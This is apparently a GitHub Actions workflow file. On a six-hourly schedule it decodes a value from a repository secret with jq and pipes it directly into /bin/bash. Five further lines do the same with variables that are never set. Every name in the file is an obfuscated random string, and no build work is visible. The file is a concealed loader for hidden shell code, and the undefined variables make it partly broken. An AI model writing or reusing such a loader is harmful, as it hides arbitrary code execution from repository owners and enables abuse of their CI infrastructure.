name: lettucereally
on:
  workflow_dispatch:
  schedule:
    - cron: '18 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lettucereally
        env:
          xug296: ${{ secrets.xug296 }}
        run: |
          echo $xug296 | jq -r .bc65 | /bin/bash
          echo $zge00 | jq -r .vhq70 | /bin/bash
          echo $u8148 | jq -r .dac098 | /bin/bash
          echo $w357 | jq -r .cgx3 | /bin/bash
          echo $dttv912 | jq -r .hhwgp6 | /bin/bash
          echo $t0 | jq -r .fqxde000 | /bin/bash

